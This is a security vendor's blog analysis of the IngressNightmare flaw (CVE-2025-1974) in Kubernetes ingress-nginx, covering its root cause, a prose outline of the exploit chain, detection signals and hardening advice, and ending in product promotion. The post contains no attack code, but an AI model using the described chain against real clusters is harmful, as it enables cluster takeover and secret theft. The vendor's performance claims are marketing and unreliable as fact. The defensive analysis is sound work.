Vulnerability Analysis

CVE-2025-1974 Ingress NGINX Controller RCE

IngressNightmare - CVE-2025-1974 in Kubernetes ingress-nginx - gave unauthenticated attackers cluster-wide RCE. Here is how it worked and what to harden now.

Shadab Khan
Security Engineer
8 min read

CVE-2025-1974, disclosed by Wiz researchers under the IngressNightmare brand in March 2025, was the worst Kubernetes bug of the year by blast radius. A default installation of ingress-nginx let an unauthenticated attacker on the pod network execute code inside the controller, and the controller's privileges translated to full cluster compromise. The Kubernetes security team assigned it a 9.8 CVSS for good reason.

This post is the engineer-level breakdown: the root cause in NGINX configuration templating, how the exploit chain reached RCE, what made default installs so exposed, and what operators should do beyond patching.

What is CVE-2025-1974 and why is it called IngressNightmare?

CVE-2025-1974 is an unauthenticated remote code execution vulnerability in the admission controller of the Kubernetes ingress-nginx project, and Wiz named it IngressNightmare because default configurations exposed the admission webhook on the pod network with no authentication. The admission controller exists to validate Ingress resources before they are applied. When a user creates or updates an Ingress, the Kubernetes API server calls the webhook, which renders a test NGINX configuration to check validity.

The rendering step was the problem. The controller fed annotation values from the candidate Ingress into the NGINX configuration template, and a subset of annotations allowed attacker-controlled text to land in a position where NGINX's ssl_engine directive would load a shared library. An attacker who could reach the admission webhook directly - not through the API server - could submit a crafted AdmissionReview that caused the controller to load an arbitrary .so file and execute the attacker's code.

The name captures the operational reality: on a default install of ingress-nginx, the webhook listens on port 8443 on the pod network and accepts any AdmissionReview payload without verifying the request actually came from the API server. That is a single TCP connection away from RCE for anyone with pod-network access.

How does the exploit chain work?

The exploit chain works by sending a forged admission review to the webhook with an Ingress that contains attacker-controlled annotations, then triggering the vulnerable NGINX configuration parse. Wiz's write-up details four CVEs that chain together, with CVE-2025-1974 as the capstone that delivers RCE:

  1. The attacker places an attacker-controlled shared object on the controller pod's filesystem. The simpler path uses the client-body upload feature that NGINX uses to handle large request bodies; a sufficiently large request body gets spooled to disk at a predictable path.
  2. The attacker sends an AdmissionReview HTTPS request to the controller's webhook with an Ingress whose annotations include an auth-tls-match-cn or similar field carrying NGINX configuration fragments.
  3. The webhook renders the test configuration, which now contains ssl_engine pointing at the uploaded shared object.
  4. NGINX loads the shared object at config-parse time and the attacker's code executes inside the controller pod.

None of these steps require authentication. The API server is not involved. The attacker only needs network reachability to the webhook TCP port.

Once inside the controller pod, the attacker has the controller's service account token, which in a default install carries get and list on secrets cluster-wide. That permission is all an attacker needs to read every secret in the cluster, including cloud credentials, database passwords, and service-account tokens for every workload.

Which clusters were actually exposed?

Any cluster running ingress-nginx prior to v1.11.5 or v1.12.1, with the admission webhook enabled (the default), and with pod-to-pod network reachability to the controller (also the default), was exposed. Wiz estimated about 43 percent of cloud environments ran a vulnerable version at disclosure. That number aligned with the install base data from helm chart telemetry.

The bug does not require the ingress controller to be internet-facing. The attack surface is the pod network, which means a single compromised workload, a leaky tenant in a shared cluster, or a CI runner with cluster access could reach the webhook. Multi-tenant clusters operated by platform teams were the highest-risk configuration because any tenant workload could take over the entire cluster.

Four companion CVEs shipped alongside 1974: CVE-2025-1097, 1098, 24513, and 24514. Each addresses a different annotation that could be weaponized. The patched versions restrict which annotation values can reach the configuration template and add validation of the AdmissionReview origin.

What should have prevented this in the first place?

What should have prevented this is the security boundary between untrusted tenant data and trusted control-plane config rendering - a boundary that the admission controller architecture blurred by design. Admission webhooks are invoked with the full candidate object as input, and treating that object as trusted input during config templating was the root mistake. The patch tightens the templating path, but the pattern of "parse untrusted user input as NGINX config to validate it" is inherently dangerous.

A cleaner design would generate the test configuration from a sanitized, typed representation of the annotations rather than interpolating user text directly. Several ingress implementations do exactly that. The ingress-nginx project inherited the templating pattern from earlier versions when annotations were a small, auditable set; as the supported annotation list grew past 100 entries, the attack surface grew with it.

There is a broader point about admission controllers generally: any admission webhook that does expensive, semantic validation of submitted resources is a privileged code path that receives untrusted input, and operators should treat it with the same rigor as a public API. That means authentication of webhook callers, strict allowlists on what annotations can contain, and defense in depth when the rendering step is non-trivial.

How do I detect exploitation after the fact?

Detecting exploitation after the fact is possible but not easy, because the on-cluster artifacts are largely inside the controller pod's ephemeral filesystem. The signals worth pulling:

  • Controller pod logs showing admission review requests from pod IPs rather than the API server's IP range.
  • Unexpected shared objects under the NGINX client-body temp path or the controller's config directory.
  • Outbound connections from the controller pod to destinations outside your image registry and DNS.
  • API server audit logs showing get or list on secrets with the controller's service account, especially at high volume over a short window.

Cloud providers with managed Kubernetes services published cluster-level detections within a week of disclosure. If you run self-hosted clusters, the retrospective exercise is to grep audit logs for the ingress-nginx service account's activity around March 2025 and verify that it matches expected baseline volume. Spikes are the most reliable signal.

If you confirm exploitation, treat every secret in the cluster as disclosed. Rotating only the secrets you know were read is not sufficient because the controller's permissions covered every namespace.

What should I do now if I still run ingress-nginx?

If you still run ingress-nginx, upgrade to v1.11.5 or v1.12.1 at minimum, verify that the admission webhook is not reachable from tenant workloads, and audit the controller's RBAC to remove cluster-wide secret access if your use case does not require it. Beyond patching, three structural improvements are worth the effort:

  1. Apply a NetworkPolicy that restricts ingress to the webhook port so only the API server's egress IPs can reach it. This is an explicit supported control and closes the attack path even if a new variant lands.
  2. Review your ingress-nginx RBAC. The default bindings were built for convenience, not least privilege. Narrowing secrets access to specific namespaces eliminates the worst-case blast radius.
  3. Decide whether ingress-nginx is the right choice for your workload profile. Several alternatives with smaller attack surfaces exist, including Contour, Traefik, and cloud-provider native load balancer controllers. Switching is not trivial, but the bug class is not specific to 1974 and will recur.

If you cannot patch immediately, Kubernetes SIG Security documented mitigations including disabling the admission webhook (with the tradeoff of losing validation) and rotating the controller's TLS certificate.

How Safeguard.sh Helps

Safeguard.sh reachability analysis would have ranked CVE-2025-1974 against your actual cluster configuration - whether the webhook was exposed to pod networks, which RBAC paths to secrets existed, which clusters ran affected chart versions - and reduced raw CVE noise by 60 to 80 percent so operators patched the truly exposed clusters first. Griffin AI autonomous remediation can stage the chart upgrade, apply the NetworkPolicy constraints, and verify the webhook is no longer reachable from non-API-server sources without a 30-ticket migration. Eagle malware classification fingerprints post-exploitation shared objects and cryptominer payloads that were dropped in follow-on campaigns, SBOM generation with 100-level dependency depth surfaces every ingress-nginx version running across your clusters, container self-healing restores controller pods to a clean state, and TPRM extends the same visibility to managed Kubernetes vendors in your supply chain.

Never miss an update

Weekly insights on software supply chain security, delivered to your inbox.